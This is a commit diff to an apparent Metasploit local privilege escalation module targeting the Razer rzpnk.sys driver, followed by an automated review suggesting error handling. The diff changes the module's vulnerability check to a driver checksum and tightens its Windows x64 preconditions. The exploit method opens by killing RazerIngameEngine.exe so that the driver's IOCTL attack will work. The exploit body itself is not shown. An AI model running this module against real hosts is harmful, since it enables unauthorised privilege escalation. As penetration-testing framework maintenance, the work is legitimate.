Update the pre-exploit check conditions

bug/bundler_fix
Spencer McIntyre 2017-07-15 14:48:54 -04:00
parent 833b2a67d4
commit b4813ce2c7
1 changed files with 19 additions and 12 deletions


@ -70,15 +70,22 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def check def check
pid = session.sys.process['RazerIngameEngine.exe'] # Validate that the driver has been loaded and that
session.sys.process.kill(pid) unless pid.nil? # the version is the same as the one expected
client.sys.config.getdrivers.each do |d|
if d[:basename].downcase == 'rzpnk.sys'
expected_checksum = 'b4598c05d5440250633e25933fff42b0'
target_checksum = client.fs.file.md5(d[:filename])
pid = session.sys.process['winlogon.exe'] if expected_checksum == Rex::Text.to_hex(target_checksum, '')
handle = get_handle(pid) return Exploit::CheckCode::Appears
return Exploit::CheckCode::Safe if handle.nil? else
return Exploit::CheckCode::Detected
end
end
end
session.railgun.kernel32.CloseHandle(handle) Exploit::CheckCode::Safe
Exploit::CheckCode::Vulnerable
end end
def exploit def exploit
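Review bot: In the rewritten `check`, an error from `client.fs.file.md5(d[:filename])` propagates out of the method instead of mapping to a CheckCode; `d[:filename]` as returned by `getdrivers` is presumably an NT-style device path that the file API may not be able to open on every host, so a read failure would abort the check rather than report the driver as present — worth confirming against a target. Catching `Rex::Post::Meterpreter::RequestError` around the hash and returning `Exploit::CheckCode::Detected` keeps the result informative, since the driver name has already matched at that point. A short comment on `expected_checksum` naming which driver build the hash corresponds to would also help whoever adds the next version. The second hunk of this section (the `exploit` method) continues past the end of the page, so it is not reviewed here.
```ruby
  if d[:basename].downcase == 'rzpnk.sys'
    expected_checksum = 'b4598c05d5440250633e25933fff42b0' # hash of the one driver build this module was written against
    begin
      target_checksum = client.fs.file.md5(d[:filename])
    rescue Rex::Post::Meterpreter::RequestError
      # driver present but its file could not be read: report it, version unverified
      return Exploit::CheckCode::Detected
    end
    # … unchanged: checksum comparison and Appears/Detected return …
```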
@ -90,14 +97,14 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end end
if sysinfo['Architecture'] =~ /wow64/i if session.platform != 'windows'
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
elsif sysinfo['Architecture'] == ARCH_X86 elsif session.arch != ARCH_X64
fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported') fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
end end
pid = session.sys.process['RazerIngameEngine.exe'] pid = session.sys.process['RazerIngameEngine.exe']
unless pid.nil? if pid
# if this process is running, the IOCTL won't work but the process runs # if this process is running, the IOCTL won't work but the process runs
# with user privileges so we can kill it # with user privileges so we can kill it
print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...") print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")